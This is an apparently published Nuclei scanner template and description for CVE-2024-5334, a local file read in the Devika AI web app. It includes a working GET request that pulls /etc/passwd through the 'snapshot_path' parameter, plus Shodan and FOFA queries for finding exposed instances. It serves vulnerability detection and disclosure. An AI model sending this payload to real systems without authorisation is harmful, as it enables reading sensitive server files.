Devika - Local File Inclusion
ID: CVE-2024-5334
Severity: high
Author: nechyo,nukunga,harksu,olfloralo,gy741
Tags: cve,cve2024,devika-ai,lfi
Description
Section titled “Description”A local file read vulnerability exists in the stitionai/devika repository, affecting the latest version. The vulnerability is due to improper handling of the ‘snapshot_path’ parameter in the ‘/api/get-browser-snapshot’ endpoint. An attacker can exploit this vulnerability by crafting a request with a malicious ‘snapshot_path’ parameter, leading to arbitrary file read from the system. This issue impacts the security of the application by allowing unauthorized access to sensitive files on the server.
YAML Source
Section titled “YAML Source”id: CVE-2024-5334
info: name: Devika - Local File Inclusion author: nechyo,nukunga,harksu,olfloralo,gy741 severity: high description: | A local file read vulnerability exists in the stitionai/devika repository, affecting the latest version. The vulnerability is due to improper handling of the 'snapshot_path' parameter in the '/api/get-browser-snapshot' endpoint. An attacker can exploit this vulnerability by crafting a request with a malicious 'snapshot_path' parameter, leading to arbitrary file read from the system. This issue impacts the security of the application by allowing unauthorized access to sensitive files on the server. impact: | Successful exploitation could lead to unauthorized access to sensitive files and data. remediation: | Ensure input validation is implemented to prevent malicious file inclusions and use whitelists for allowed file paths. reference: - https://huntr.com/bounties/7eec128b-1bf5-4922-a95c-551ad3695cf6 - https://github.com/stitionai/devika/commit/6acce21fb08c3d1123ef05df6a33912bf0ee77c2 - https://nvd.nist.gov/vuln/detail/CVE-2024-5334 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-5334 cwe-id: CWE-73 epss-score: 0.00043 epss-percentile: 0.09666 metadata: max-request: 1 shodan-query: title:"Devika AI" fofa-query: title="Devika AI" tags: cve,cve2024,devika-ai,lfi
http: - raw: - | GET /api/get-browser-snapshot?snapshot_path=/etc/passwd HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:"
- type: word part: header words: - "attachment; filename=passwd" - "application/octet-stream" condition: and
- type: status status: - 200# digest: 4b0a004830460221008514bd1b582f58f04d1f552a6f5b845954a51f9e2b88c1eef5f20315c3a45cb0022100a76615b7d4f01cba0203ca665a7c59633d6050026c6f06d8f3d18646d8282204:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-5334.yaml"